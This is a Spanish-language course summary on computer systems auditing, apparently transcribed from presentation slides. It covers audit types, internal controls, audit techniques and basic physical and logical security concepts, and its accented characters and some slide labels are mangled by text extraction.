resumen sobre el curso de Auditorias de Sistemas

56
AUDITORÍA DE SISTEMAS COMPUTACIONALES •La auditoría de sistemas computacionales está clasificada como una disciplina. •De las ciencias exactas de la economía y administración Auditoria Informática en Sistemas Computacionales •La auditoría informática es el proceso de: •Recoger, •Agrupar •Evaluar Evidencias para determinar si un sistema de información salvaguarda : •El activo empresarial. •Mantiene la integridad de los datos. •Lleva a cabo eficazmente los fines de la organización. •Utiliza eficientemente los recursos. •Cumple con las leyes y regulaciones establecidas. Orígenes de la Auditoría Se remontan a: •Revisión y Diagnostico de registros de las operaciones contables de una empresa. Posteriormente Pasamos al: •Análisis •Verificación •Evaluación De los aspectos financieros. Posteriormente se amplio el campo de acción a: Examinar rubros de administración. Revisión Integral Luego se evoluciono a: •Análisis de aspectos que intervienen en todas las actividades.

description

este es un resumen del curso de Auditoria de Sistemas de la Carrera de Ingerieria en Sistemas de Información.Mapas conceptuales y mápas mentales para su mejor utilización

Transcript of resumen sobre el curso de Auditorias de Sistemas

  • AUDITORA DE SISTEMAS COMPUTACIONALES

    La auditora de sistemas computacionales est clasificada como una disciplina.

    De las ciencias exactas de la economa y administracin

    Auditoria Informtica en Sistemas Computacionales La auditora informtica es el proceso de:

    Recoger,

    Agrupar

    Evaluar Evidencias para determinar si un sistema de informacin salvaguarda :

    El activo empresarial.

    Mantiene la integridad de los datos.

    Lleva a cabo eficazmente los fines de la organizacin.

    Utiliza eficientemente los recursos.

    Cumple con las leyes y regulaciones establecidas.

    Orgenes de la Auditora

    Se remontan a: Revisin y Diagnostico de registros de las operaciones contables de una empresa. Posteriormente Pasamos al: Anlisis

    Verificacin

    Evaluacin De los aspectos financieros. Posteriormente se amplio el campo de accin a: Examinar rubros de administracin.

    Revisin Integral

    Luego se evoluciono a: Anlisis de aspectos que intervienen en todas las actividades.

  • Por ltimo: Se llevo a lo que se conoce como revisin integral de la organizacin

    Nacimiento de las Auditoras Computacionales

    Se comenz a realizar inspecciones en reas especializadas o especificas y entre todas los departamentos por clasificarlos de alguna forma y fue como se llego a la :

    AUDITORIA DE SISTEMAS COMPUTACIONALES

    ANTECEDENTES DE LA AUDITORA - Comercio primitivo

    - Comercio por trueque

    - Trueque a nivel de aldea

    - Comercio a nivel ciudad

    - Comercio a nivel estado

    - Comercio a nivel continente

    - Mecanismos rudimentarios de registros

    - Se da inicio a los gremios

    - Mercados locales

    - Comienzan las empresas incipientes

    - Los escribas toman el control

    - Aparece la partida doble libro diario

    - Surge la llamada: tenedura de libros

    - Esta tcnica evoluciono y llego a llamarse: contabilidad cuyo objetivo es: veracidad y

    confiabilidad en los datos

    - Actualmente la contabilidad se maneja por medios informticos

    - En este momento nace la necesidad de que alguien evalu estos controles

    La Auditora de Sistemas Computacionales

    Se apoya en ellas para ejecutar sus revisiones.

    Utilizando sus tcnicas y metodologas de evaluacin.

    CONCEPTOS BSICOS SOBRE LA AUDITORA Definicin de Auditora: Revisin independiente de alguna actividad, funciones especificas, resultados u operaciones

    administrativas, realizadas por un profesional, con el propsito de evaluar su correcta realizacin

  • Y, con base en ese anlisis poder emitir una opinin autorizada sobre las razones de sus

    resultados.

    Auditor

    Persona capacitada para realizar auditoras en una empresa u otras instituciones. Es la persona que se encarga de revisar los registros, procedimientos y transacciones financieras de una organizacin hechas por especialistas.

    Auditora

    LA ACCIN - Supervisin de las cuentas de una empresa, hecha por decisin de un tribunal o

    instancia en particular.

    CLASIFICACIN DE LOS TIPOS DE AUDITORA

    Auditoras por su lugar de Aplicacin

    Auditora Externa Auditor no tiene

    relacin directa con la empresa

    Auditora Interna Existe alguna relacin

    del auditor con la empresa

    Auditoras por su rea de Aplicacin

    Auditora Financiera

    Auditora Administrativa

    Auditora Operacional

    Auditora Integral

    Auditora Gubernamental

    Auditora de Sistemas

  • AUDITORAS ESPECIALIZADAS EN REAS ESPECFICAS

    Au

    dit

    or

    a p

    or

    su

    rea

    de

    Ap

    licac

    in

    Auditora rea mdica

    Auditora de obras construcciones

    Auditora Fiscal

    Auditora Laboral

    Auditora Proyectos de Inversin

    Auditora caja chica o mayor

    Auditora inventarios

    Auditora ambiental

    Auditora de sistemas

    Auditora de sistemas computacionales

    Auditora Informtica

    Auditora con la computadora

    Auditora sin la computadora

    Auditora a la Gestin Informtica

    Auditora al Sistema de Cmputo

    Auditora alrededor de la computadora

    Auditora de la seguridad de sistemas computacionales

    Auditora a los sistemas de redes

    Auditora Integral a los centros de cmputo

    Auditora ISO-9000 a los sistemas computacionales

    Auditora Outsourcing

    Auditora ergonmica de sistemas computaciones

  • AUDITORIA EXTERNA

    AU

    DIT

    OR

    IA E

    XTE

    RN

    APrincipal caracterstica es

    que la realizan ajenos totalmente a la empresa.

    Permite: Utilizar libre albedrio para;

    Aplicar mtodos tcnicas y herramientas. Para evaluar las

    actividades

    El resultado ser absolutamente independiente.

    Ventajas

    El trabajo es totalmente independiente.

    Libre de injerencias de parte de las autoridades de la empresa auditada.

    Por ser empresas especializadas cuenta con personal con mucha experiencia

    La razn: Es que ya utilizaron tcnicas y herramientas con otras empresas con

    caractersticas similares.

    Otra es que su dictamen es validado por autoridades

    Desventajas

    La mayor es que el auditor conoce poco empresa.

    Depende de los empleados auditados para realizar su trabajo.

    Su evaluacin, alcances pueden ser limitados.

    El ambiente es hostil hacia el auditor.

    El costo para el empresa es oneroso.

  • AU

    DIT

    OR

    IA IN

    TER

    NA

    Principal caracterstica

    El auditor labora en la misma empresa

    Esto le permite estar involucrado en las operaciones

    Por su acercamiento a las autoridades de la empresa su juicio de valor podra verse

    afectado

    Ventajas

    Conoce integralmente las actividades operaciones reas.

    Revisa con mayor profundidad y conocimiento de las actividades y

    problemas de la empresa.

    Su informe es interno y es enviado a los superiores nunca sale de las oficinas.

    Al ser parte de la empresa no se consumen honorarios adicionales

    La ms importante es que detectar problemas y desviaciones a tiempo

    Desventajas

    Las autoridades pueden influir en sus informes(injerencia)

    Puede experimentar presiones, compromisos, y hasta ciertos intereses de

    algunos pocos.

  • CLASIFICACIN DE AUDITORAS POR SU REA DE APLICACIN Se refiere al mbito especfico donde se llevan a cabo las actividades y operaciones que sern

    auditadas, de acuerdo al rea de trabajo e influencia de la rama o especialidad que ser evaluada

    Au

    dit

    or

    a Fi

    nan

    cier

    a Primer tipo de auditora que existi en el mbito comercial.Este tipo de auditora es la principal actividad del auditor, consiste en

    revisar que se haya aplicado los registros contables de forma oportuna y correcta.

    Revisin sistemtica , explorativa y critica. Realizada por un profesional a los sistemas contables. Con el fin de evaluar la razonabilidad, veracidad,

    confiabilidad, y oportunidad en la emisin de los resultados financieros.

    Au

    dit

    or

    a A

    dm

    inis

    trat

    iva

    Revisin sistemtica y exhaustiva que se realiza en las actividades

    administrativas. En cuanto a:

    Relacin entre integrantes.

    Cumplimiento de Funciones

    Actividades que regulan sus operaciones

  • Au

    dit

    or

    a O

    per

    acio

    nal

    Revisin sistemtica, exhaustiva y especfica de las actividades de una empresa. Evala:

    Existencia

    Suficiencia

    Eficacia

    Eficiencia

    Correcto desarrollo de operaciones

    Au

    dit

    or

    a In

    tegr

    al

    Revisin exhaustiva, sistemtica y global

    que realiza un equipo multidisciplinario de profesionales a todas

    las actividades y operaciones de la

    empresa para evaluar:

    Funciones Administrativas

    Resultados Conjuntos

    Relaciones de Trabajo

    Comunicaciones y Procedimientos

    Normas Polticas y Lineamientos sobre los recursos de la empresa.

    El propsito fundamental de este tipo de auditora tan

    especializada es Auditar de manera conjunta todas las:

    Actividades

    Funciones

    Operaciones de todas las reas de la empresa

  • Au

    dit

    or

    a G

    ub

    ern

    amen

    tal Es la revisin exhaustiva,

    sistemtica y concreta que se realiza a todas las actividades y

    operaciones de un ente gubernamental. Evala:

    Correcto desarrollo de funciones en todas las reas administrativas

    Mtodos y procedimientos.

    Cual es la razn de ser de esta auditora si ya exista la auditora

    integral.

    Alcanzar los objetivos de gobierno.

    Haya un aplicacin y cumplimiento del presupuesto pblico

    La integral evoluciono suficientemente para esta acccin.

    Au

    dit

    or

    a In

    form

    tic

    a

    Revisin tcnica, especializada y exhaustiva que se realiza a :

    Sistemas computacionales

    Software

    Datos de la empresa

    Instalaciones

    Telecomunicaciones

    Redes

    Mobiliario

    Equipos perifricos

    Y dems componentes.

    Esta revisin tambin aplica a la:

    Gestin informtica.

    Aprovechamiento de recursos.

    Medidas de seguridad

    Bienes consumo o suministros

  • Propsito Fundamental Auditora Informtica

    Evaluar:

    Uso adecuado de los sistemas para:

    Correcto ingreso de datos.

    Procesamiento adecuado de la informacin.

    Emisin oportuna de reportes.

    Cumplimiento de funciones

    Actividades y operaciones de empleados

    involucrados en los sistemas computacionales.

    Los avances tecnolgicos son cada vez ms

    singulares y peculiares por lo que no es suficiente:

    Mtodos

    Tcnicas

    Herramientas

    Procedimientos

  • Auditora Informtica

    Revisin tcnica, especializada y exhaustiva que se realiza a:

    Sistemas computacionales

    Software

    Informacin de la empresa

    Dicho de forma general y similar a nuestro anterior concepto y de momento

    mientras abordamos todas las dems.

    Auditora con la

    computadora

    Es la auditora que se realiza con el apoyo de los equipos de cmputo y sus programas para

    evaluar cualquier tipo de actividades y operaciones, no necesariamente

    computarizadas, pero s susceptibles de ser automatizadas.

    Auditora sin la

    computadora

    Es la auditoria cuyos mtodos, tcnicas y procedimientos estn

    orientados nicamente a la evaluacin tradicional del

    comportamiento y validez de las transacciones econmicas,

    administrativas y operacionales de un rea de cmputo.

    Evala:

    Estructura de la organizacin

    Funciones y actividades de funcionarios

    Personal del centro de cmputo

    Perfil de los puestos

    Reporte, informes, bitcoras de los sistemas

    Existencia de programas, planes presupuestos en centro cmputo

    Uso y aprovechamiento de los recursos.

    Seguridad y prevencin

    Contingencias

    Procedimientos para adquirir nuevo hardware y software

    Contratacin de nuevo personal

  • Auditora a la Gestin Informtica

    Se toma de carcter administrativa y

    operacional. Auditora cuya aplicacin esta

    enfocada a:

    Planeacin

    Direccin

    Control de un Centro

    Tambin se utiliza para:

    Evaluar el cumplimiento de las funciones y

    actividades del funcionario empleados

    usuarios del rea de sistemas

    Revisa y evala:

    Operaciones del sistema

    Uso y proteccin de los sistemas de

    procesamiento

    Programas e informacin

    Mantenimiento y explotacin de los

    sistemas equipos e instalaciones

  • Auditora en Sistemas Computacionales

    Auditoria ms especializada y

    concreta.

    Enfocada a la actividad y operacin de los

    sistemas computacionales.

    Aqu se utiliza ms:Evaluacin tcnica y

    especializada.

    Evala:

    Funcionamiento y uso correcto del equipo de

    computo.

    Hardware

    Software y perifricos asociados

    Arquitectura fsica y componentes de

    hardware

    Desarrollo y uso de software de operacin.

    Lenguajes de desarrollo.

    Por ultimo incluye la operacin del sistema

  • Auditora alrededor de la computadora

    Es la revisin especfica que se realiza a todo lo que est alrededor de un equipo de

    cmputo, como son

    sus sistemas

    actividades funcionamientoshaciendo una evaluacin

    de sus mtodos y procedimientos.

    Auditora de la seguridad de los sistemas

    computacionales

    Seguridad es uno de los aspectos ms importantes

    en los sistemas computacionales-

    Revisin exhaustiva, tcnica y especializada a la

    seguridad de un sistema a:.

    reas y el personal.

    Actividades de los funcionarios

    Acciones preventivas y Correctivas que se tengan.

    PLANES DE CONTINGENCIA.

    Medidas de proteccin de la informacin

  • Au

    dit

    or

    a a

    los

    Sist

    emas

    de

    Red

    es

    Revisin exhaustiva, especfica y

    especializada que se realiza a los sistemas computacionales de

    redes de una empresa.

    Revisa

    Arquitectura

    Topologa

    Protocolos de Comunicacin

    Conexiones

    Accesos

    Privilegios

    Administracin

    Instalacin

    Funcionalidad

    Aprovechamiento

    Revisin del software institucional

    Recursos informticos

    Informacin de las operaciones

    Bases de datos compartidas

    Software y Hardware de la red

  • Au

    dit

    or

    a In

    tegr

    al a

    los

    cen

    tro

    s d

    e c

    mp

    uto Es la revisin

    exhaustiva, sistemtica y global que se realiza por

    medio de un equipo

    multidisciplinario de auditores, de

    todas las actividades y

    operaciones de un centro

    sistematizacin.

    Se Evalua

    Uso adecuado de los sistemas de cmputo.

    Equipos Perifricos.

    Apoyo para el procesamiento de informacin de la empresa.

    Red de servicio de la empresa

    Desarrollo correcto de las funciones de sus reas, personal y usuarios.

    Administracin del sistema.

    Manejo y control de sistemas operativos.

    Lenguajes.

    Programas.

    Software de aplicacin.

    Administracin y control de proyectos

    Adquisicin de hardware y software

    Administracin y control de proyectos.

    Integracin y uso de los recursos informticos.

    Existencia y cumplimiento de

    las normas

    polticas

    estndares

    procedimientos del sistema

    personal

    usuarios del centro de cmputo.

  • Auditora ISO-9000 a los Sistemas

    Computacionales

    Revisin exhaustiva, sistemtica y

    especializada que realizan nicamente

    los auditores especializados y

    certificados en las normas y

    procedimientos ISO-9000

    El propsito fundamental de esta

    revisin es:

    Evaluar

    Dictaminar

    Certificar

    Que la calidad de los sistemas

    computacionales se apegue a los

    requerimientos del ISO-9000

    Au

    dit

    or

    a O

    uts

    ou

    rcin

    g

    Revisin exhaustiva, sistemtica y

    especializada que se realiza para evaluar la

    calidad en el servicio de asesora o

    procesamiento externo de informacin que

    proporciona una empresa.

    Objetivo

    Revisar confiabilidad.

    Oportunidad.

    Suficiencia.

    Asesora de los prestadores del servicio.

    Cumplimiento de las funciones y actividades.

  • Auditora Ergonmica de Sistemas

    Computacionales

    Es la revisin tcnica, especfica y

    especializada que se realiza para evaluar :

    Calidad

    Eficiencia

    Utilidad del entorno hombre-maquina-medio

    ambiente.

    evalua

    Correcta adquisicin y uso de mobiliario y equipo y

    sistemas.

    Bienestar confort comodidad que necesita un

    usuario.

    Deteccin de problemas y repercusiones con la salud

    fsica y bienestar del usuario.

    Objetivos

    Realizar una revisin independiente

    Hacer una revisin especializada

    Evaluar el cumplimiento de planes

    Evaluar el cumplimiento de planes

  • SIMILITUDES Y DIFERENCIAS EN LA AUDITORIA INTERNA Y EXTERNA

    CONTROL INTERNO INFORMTICO AUDITOR INFORMTICO

    SIMILITUDES PERSONAL INTERNO

    Conocimientos especializados en tecnologas de informacin verificacin

    del cumplimiento de controles internos, normativa y procedimientos

    establecidos por la direccin informtica y la direccin general para los

    sistemas de informacin.

    DIFERENCIAS Anlisis de los controles en el da a da.

    Informa a la direccin del

    departamento de informtica.

    Slo personal interno.

    El enlace de sus funciones es

    nicamente sobre el departamento de

    informtica.

    Anlisis de un momento

    informtico determinado. Informa

    a la direccin general de la

    organizacin.

    Personal interno y/o externo.

    Tiene cobertura sobre todos los

    componentes de los sistemas de

    informacin de la organizacin.

    Elementos fundamentales del control interno informtico CONTROLES INTERNOS SOBRE LA ORGANIZACIN DEL REA DE INFORMTICA

    - Direccin

    - Divisin del trabajo

    - Asignacin de responsabilidad y autoridad

    - Establecimiento de estndares y Mtodos

    - Perfiles de puestos

    CONTROLES INTERNOS SOBRE EL ANLISIS, DESARROLLO E IMPELEMENTACIN DE SISTEMAS

    - Estandarizacin de metodologas para el desarrollo de proyectos

    - Elaborar estudios de factibilidad del sistema

    - Garantiza la eficiencia y eficacia en el anlisis y diseo de sistemas

    - Vigilar la efectividad y eficiencia en la implementacin y mantenimiento del sistema

    - Optimizar el uso del sistema por medio de su documentacin

    CONTROLES INTERNOS SOBRE LA OPERACIN DEL SISTEMA

    - Prevenir y corregir los errores de operacin

    - Prevenir y evitar la manipulacin fraudulenta de la informacin

    - Implementar y mantener la seguridad en la operacin

  • - Mantener la confiabilidad, oportunidad, veracidad y suficiencia en el procesamiento de la

    informacin

    CONTROLES INTERNOS SOBRE LOS PROCEDIMIENTOS DE ENTRADA DE DATOS, EL

    PROCESAMIENTO DE INFORMACIN Y LA EMISIN DE RESULTADOS

    - Verificar existencia de procedimientos de captura de datos

    - Comprobar que todos los datos sean procesados

    - Verificar confiabilidad, veracidad y exactitud en el procesamiento de datos

    - Comprobar la oportunidad, confiabilidad y veracidad en la emisin de reportes del

    procesamiento de informacin

    CONTROLES INTERNOS SOBRE LA SEGURIDAD DEL AREA DE SISTEMAS

    - Controles para prevenir y evitar amenazas, riesgos y contingencias que puedan incidir en los

    sistemas.

    - Controles sobre la seguridad fsica del rea de sistemas

    - Controles sobre la seguridad lgica de los sistemas

    - Controles sobre la seguridad de las bases de datos

    - Controles sobre la seguridad de los sistemas computacionales

    - Controles sobre la seguridad del personal de informtica

    - Controles sobre la seguridad de las telecomunicaciones de informtica

    - Controles sobre la seguridad de las redes

    LAS SIETE FASES DE SDLC - Identificacin de problemas, oportunidades y objetivos

    - Determinacin de los requerimientos de informacin

    - Anlisis de necesidades de sistema

    - Diseo del sistema recomendado

    - Desarrollo y documentacin del software

    - Pruebas y mantenimiento del software

    - Implementacin y evaluacin del sistema

    AUDITORA INFORMTICA - Regular Informtica:

    o Se refiere a la calidad de la informacin existente en las bases de datos de los

    sistemas informticos que se utilizan para controlar los recursos, su entorno y los

    riesgos asociados a esta actividad.

    - Especial Informtica:

    o El anlisis de los aspectos especficos relativos a las bases de datos de los sistemas

    informticos en que se haya detectado algn tipo de alteracin o incorrecta

    operatoria de los mismos.

    - Recurrente Informtica:

  • o Se examina los Planes de Medidas elaborados en auditoras informticas anteriores

    donde se obtuvo la calificacin de Deficiente o Malo, ya sea en una Regular o

    Especial.

    Auditora Informtica

    Es una disciplina incluida en el campo de la auditora y es el anlisis de las condiciones de una

    instalacin informtica por un auditor externo e independiente que realiza un dictamen sobre

    diferentes aspectos.

    Auditora Informtica se puede definir como el conjunto de procedimientos y tcnicas para

    evaluar y controlar un sistema informtico con el fin de constatar si sus actividades son correctas

    y de acuerdo a las normativas informticas y generales en la empresa.

    La Auditora Informtica a ms de la evaluacin de los computadores, de un sistema o

    procedimiento especfico, habr de evaluar los sistemas de informacin en general desde sus

    entradas, procedimientos, controles, obtencin de informacin, archivos y seguridad. Siendo de

    vital importancia para el buen desempeo de los sistemas de informacin, ya que proporciona los

    controles necesarios para que los sistemas sean confiables y con un buen nivel de seguridad.

    Adems debe evaluar todo: Informtica, organizacin de centros de informacin, hardware y

    software, el auditor informtico ha de velar por la correcta utilizacin de los amplios recursos que

    la empresa pone en juego para disponer de un eficiente y eficaz sistema de Informacin.

    Las fases ms importantes en el desarrollo de la auditora informtica son las siguientes:

    - Toma de Contacto

    - Validacin de la Informacin

    - Desarrollo de la Auditora

    - Fase de Diagnstico

    - Presentacin de Conclusiones

    - Formacin del Plan de Mejoras (Recomendaciones).

    Tcnicas o herramientas usadas por la Auditora Informtica

    Cuestionarios

    La informacin recopilada es muy importante, y esto se consigue con el levantamiento de

    informacin y documentacin de todo tipo. Los resultados que arroje una auditora se ven

    reflejados en los informes finales que estos emitan y su capacidad para el anlisis de situaciones

    de debilidades o de fortalezas que se dan en los diversos ambientes. El denominado trabajo de

    campo consiste en que el auditor busca por medio de cuestionarios recabar informacin

    necesaria para ser discernida y emitir finalmente un juicio global objetivo, los que deben ser

    sustentados por hechos demostrables, a quienes se les llama evidencias.

  • Esto se puede conseguir, solicitando el cumplimiento del desarrollo de formularios o cuestionarios

    lo que son preimpresos, los cuales son dirigidas a las personas que el auditor considera ms

    indicadas, no existe la obligacin de que estas personas sean las responsables de dichas reas a

    auditar.

    Cada cuestionario es diferente y muy especfico para cada rea, adems deben ser elaborados con

    mucho cuidado tomando en cuenta el fondo y la forma. De la informacin que ha sido analizada

    cuidadosamente, se elaborar otra informacin la cual ser emitida por el propio Auditor. Estas

    informaciones sern cruzadas, lo que viene a ser uno de los pilares de la auditora.

    Muchas veces el auditor logra recopilar la informacin por otros medios, y que estos preimpresos

    podan haber proporcionado, cuando se da este caso, se puede omitir esta primera fase de la

    auditora

    Entrevistas

    Tres formas existentes hacen que el auditor logre relacionarse con el personal auditado.

    - La solicitud de la informacin requerida, esta debe ser concreta y debe ser de la materia de

    responsabilidad del auditado.

    - En la entrevista no se sigue un plan predeterminado ni un mtodo estricto de sometimiento

    a un cuestionario.

    - La entrevista es un medio por el que el auditor usar metodologas las que han sido

    establecidas previamente con la finalidad de encontrar informacin concreta.

    La importancia que la entrevista tiene en la auditora se debe a que la informacin que recoge es

    mayor, se encuentra mejor elaborada, y es ms concreta que las que pueden proporcionar los

    medios tcnicos, o los cuestionarios. La entrevista personal entre el auditor y el personal

    auditado, es basada en una serie de preguntas especficas en las que el auditado deber

    responder directamente.

    Checklist

    El uso del Checklist goza de opiniones compartidas, debido a que descalifica en cierta forma al

    auditor informtico, ya que al hacer uso de este tipo de cuestionarios el auditor incurre en la falta

    de profesionalismo. Por eso es mejor que se de un procesamiento de la informacin a fin de

    llegar a respuestas que tengan coherencia y as poder definir correctamente los puntos ms

    dbiles y los ms fuertes; el profesionalismo del auditor se refleja en la elaboracin de preguntas

    muy bien analizadas, las mismas que se hacen de forma no muy rigurosa.

  • Estos cuestionarios deben ser contestados oralmente, ya que superan en riqueza a cualquier otra

    forma de obtencin de informacin.

    El personal auditado generalmente se encuentra familiarizado con el perfil tcnico y lo percibe

    fcilmente, as como los conocimientos del auditor. De acuerdo a esta percepcin denota el

    respeto y el prestigio que debe poseer el auditor.

    Por ello es muy importante tener elaboradas las listas de preguntas, pero an es mucho ms

    importante la forma y el orden en que estas se formulan, ya que no serviran de mucho si es que

    no se desarrollan oportuna y adecuadamente.

    Puede ser que alguna pregunta deba repetirse, pero en este caso deber ser formulada en forma

    diferente, o su equivalencia. Con la ayuda de este mtodo los puntos contradictorios sern

    notorios de forma ms rpida. Cuando se dan casos en los que existe contradiccin, entonces se

    har una reelaboracin de preguntas para complementar a las formuladas previamente y as

    poder conseguir consistencia.

    Estos Checklist responden a dos tipos de razonamiento para su calificacin o evaluacin:

    - Checklist de rango: contendr preguntas que se harn dentro de los parmetros

    establecidos, por ejemplo, de 1 a 5, siendo 1 la respuesta ms negativa y 5 la ms positiva.

    - Checklist Binario: preguntas que son formuladas con respuesta nica y excluyente, Si o No;

    verdadero o falso.

    Tipos de Auditoras Informticas

    Los objetivos generales de la Auditora Informtica cambian dependiendo de las tareas que tiene

    que verificar o controlar, por ejemplo:

    - En la Auditora de Sistemas tendr que controlar la interfaz de usuario, la documentacin de

    la aplicacin.

    - En la Auditora Ofimtica (dentro de la Auditora de Sistemas) tendr que controlar la

    instalacin de la aplicacin, el movimiento de la informacin.

    - En la Auditora de Redes tendr que controlar la conexin entre los computadores, la

    instalacin del software para la red.

    - En la Auditora para la Administracin de las Bases de Datos tendr que controlar la

    integridad de los datos, la concurrencia a la Base de Datos.

    - En la Auditora en Tecnologas Internet tendr que controlar las ventajas de portabilidad de

    las aplicaciones del lado del cliente, la accesibilidad desde diferentes dispositivos

    (diferentes sistemas operativos, celulares, palm, etc.).

    Debido a los diferentes tipos de auditora informtica el auditor debe conocer bien el rea que va

    a auditar y slo de esta forma podr realizar un buen trabajo; esto quiere decir que si el Auditor va

    a realizar una Auditora de Redes el tendr que ser especialista de Redes o por lo menos conocer

  • muy bien el manejo y funcionamiento de las redes e incluso entre diferentes Sistemas Operativos

    y as con todos los tipos de Auditoras

    Seguridad Informtica: La seguridad permite garantizar que los recursos informticos de una compaa estn disponibles

    para cumplir sus propsitos, es decir, que no estn daados o alterados por circunstancias o

    factores externos, es una definicin til para conocer lo que implica el concepto de seguridad

    informtica. Entendindose como peligro o dao todo aquello que pueda afectar su

    funcionamiento directo o los resultados que se obtienen del mismo.

    La seguridad es un tema muy importante para cualquier empresa, este o no conectada a una red

    pblica. Los niveles de seguridad que se pueden implementar son muchos y depender del usuario

    hasta donde quiera llegar.

    La seguridad informtica y de datos en una empresa dista mucho de simplemente tener un

    Firewall. Se aborda un proceso de seguridad recomendado a utilizar por lo menos las siguientes

    herramientas:

    - Un firewall o combinacin de ellos.

    - Proxies.

    - Un sistema de deteccin de intrusos o IDS.

    - Sistemas de actualizacin automtica de software.

    - Sistemas de control de la integridad de los servidores, paquetes, etc.

    - Un sistema de administracin y control para monitorear la seguridad.

    Segn expertos hasta hoy en da todava no se ha creado un sistema que sea 100% seguro y

    explican que un sistema se puede definir como seguro cuando tiene las tres caractersticas

    principales como son: Integridad (Autorizacin para que la informacin sea modificada),

    Confidencialidad (Informacin asequible para autorizados), Disponibilidad (Disponible solo cuando

    se necesite).

    En otras palabras la seguridad puede entenderse como aquellas reglas tcnicas o actividades

    destinadas a prevenir, proteger y resguardar lo que es considerado como susceptible de robo,

    prdida o dao, ya sea de manera personal, grupal o empresarial.

    En este sentido, es la informacin el elemento principal a proteger, resguardar y recuperar dentro

    de las redes empresariales.

    La seguridad informtica de una empresa es primordial debido a la existencia de personas ajenas a

    la informacin (hackers), quienes buscan la mnima oportunidad para acceder a la red, modificar,

    borrar datos o tomar informacin que puede ser de vital importancia para la empresa.

    Tales personajes pueden, incluso, formar parte del personal administrativo o de sistemas, de

    cualquier compaa; de acuerdo con expertos en el rea, ms de 70% de las violaciones a los

    recursos informticos se realiza por el personal interno, debido a que ste conoce los procesos,

  • metodologas o tiene acceso a la informacin sensible de la empresa que puede afectar el buen

    funcionamiento de la organizacin, pudiendo representar un dao con valor de miles o millones

    de dlares.

    En el momento de instalar un sistema y haber invertido con mecanismos de seguridad, se debera

    plantear la pregunta: cul debe ser el nivel de seguridad de la empresa? La respuesta va a

    depender de la importancia que tenga la informacin y los recursos que compongan el sistema. De

    tal forma que se necesite asegurar pero no ser lo mismo con un sistema informtico bancario,

    que con los que contengan informacin que afecte a la seguridad del estado, o que aquellos

    destinados al desarrollo de aplicaciones informticas comerciales, o simples programas para

    computadores personales del hogar.

    Se debe establecer polticas de seguridad como un factor importante para la empresa, pudiendo

    ser el monitoreo de la red, los enlaces de telecomunicaciones, respaldar datos, para establecer los

    niveles de proteccin de los recursos.

    Es recomendable que las polticas se basen en los siguientes puntos:

    - Identificar y seleccionar la informacin sensible (que se debe proteger).

    - Establecer niveles de importancia en la informacin.

    - Dar a conocer los resultados que traera a la organizacin, si se llegase a perder la

    informacin importante. Referente a costos y productividad.

    - Identificar los niveles de vulnerabilidad de la red y las amenazas que tiene al tener una red

    mal estructurada.

    - Realizar un anlisis de los costos para prevenir y recuperar la informacin en el caso de

    sufrir un ataque.

    - Implementar respuesta a incidentes y recuperacin para disminuir el impacto.

    Las polticas detalladas permitirn desplegar un diseo de la seguridad basada en soluciones

    tcnicas, as como el desarrollo de un plan de contingencias para manejar los incidentes y

    disminuir el impacto que estas causaran.

    SEGURIDAD FSICA Es muy importante ser consciente que por ms que la empresa sea la ms segura desde el punto

    de vista de ataques externos, Hackers, virus, etc.; la seguridad de la misma ser nula si no se ha

    previsto como combatir un incendio o algn tipo de desastre natural.

    La seguridad fsica es uno de los aspectos ms olvidados a la hora del diseo de un sistema

    informtico. La Seguridad Fsica consiste en la aplicacin de barreras fsicas y procedimientos de

    control, como medidas de prevencin y contramedidas ante amenazas a los recursos e

    informacin confidencial. Refirindose de esta manera a los controles y mecanismos de seguridad

    dentro y alrededor del Centro de Cmputo as como los medios de acceso remoto; implementado

    para proteger el hardware y medios de almacenamiento de datos.

  • TIPOS DE DESASTRES Este tipo de seguridad est enfocado a cubrir las amenazas ocasionadas tanto por el hombre como

    por la naturaleza del medio fsico en que se encuentra ubicada la seccin de procesamiento de

    datos.

    Las principales amenazas que se prevn en la seguridad fsica son:

    - Desastres naturales, incendios accidentales tormentas e inundaciones.

    - Amenazas ocasionadas por el hombre.

    - Disturbios, sabotajes internos y externos deliberados.

    A veces basta recurrir al sentido comn para darse cuenta que cerrar una puerta con llave o

    cortar la electricidad en ciertas reas siguen siendo tcnicas vlidas en cualquier entorno.

    A continuacin se analizan los peligros ms importantes que se corren en un centro de

    procesamiento; con el objetivo de mantener una serie de acciones a seguir en forma eficaz y

    oportuna para la prevencin, reduccin, recuperacin y correccin de los diferentes tipos de

    riesgos.

    - Incendios

    - Inundaciones

    - Condiciones Climatolgicas

    - Instalaciones Elctricas

    Acciones Hostiles

    - Robo

    - Fraude

    - Sabotaje

    SEGURIDAD LGICA Luego de ver como nuestro sistema puede verse afectado por la falta de Seguridad Fsica, es

    importante recalcar que la mayora de los daos que puede sufrir un centro de cmputo no ser

    sobre los medios fsicos sino contra informacin almacenada y procesada.

    El activo ms importante que se posee una empresa es la informacin, y por lo tanto deben existir

    tcnicas, ms all de la seguridad fsica, que la aseguren. Estas tcnicas las brinda la Seguridad

    Lgica.

    Es decir que la Seguridad Lgica consiste en la aplicacin de barreras y procedimientos que

    resguarden el acceso a los datos y slo se permita acceder a ellos a las personas autorizadas para

    hacerlo.

    Los objetivos que plantean este tipo de seguridades son:

  • - Restringir el acceso a los programas y archivos.

    - Asegurar que los operadores puedan trabajar sin una supervisin minuciosa y no puedan

    modificar los programas ni los archivos que no correspondan.

    - Asegurar que se estn utilizados los datos, archivos y programas correctos.

    - Que la informacin transmitida sea recibida slo por el destinatario al cual ha sido enviada y

    no a otro.

    - Que la informacin recibida sea la misma que ha sido transmitida.

    - Que existan sistemas alternativos secundarios de transmisin entre diferentes puntos.

    - Que se disponga de pasos alternativos de emergencia para la transmisin de informacin.

    CONTROL DE SISTEMAS E INFORMTICA El control de sistemas e informtica consiste en examinar los recursos, las operaciones, los

    beneficios y los gastos de las producciones, de los organismos sujetos a control, con la finalidad de

    evaluar la eficacia y eficiencia Administrativa, Tcnica y Operacional. Asimismo de los Sistemas

    (Planes, Programas y Presupuestos, Diseo, Software, Hardware, Seguridad, Respaldos y otros)

    adoptados por la empresa.

    Existe otra definicin sobre el "control tcnico" en materia de Sistemas e Informtica, y esta se

    orienta a la revisin del Diseo de los Planes, Diseos de los Sistemas, la demostracin de su

    eficacia, Pruebas de Productividad de Gestin, el anlisis de resultados, niveles y medios de

    seguridad, respaldo, y el almacenamiento.

    Los controles pueden ser de dos tipos: control visual que permiten eliminar muchos riesgos de

    forma sencilla, y los controles de validez que se basan en estadsticas que indican posibles riesgos

    inminentes, de tal forma que se pueda prevenir. Un control es una muestra de acciones

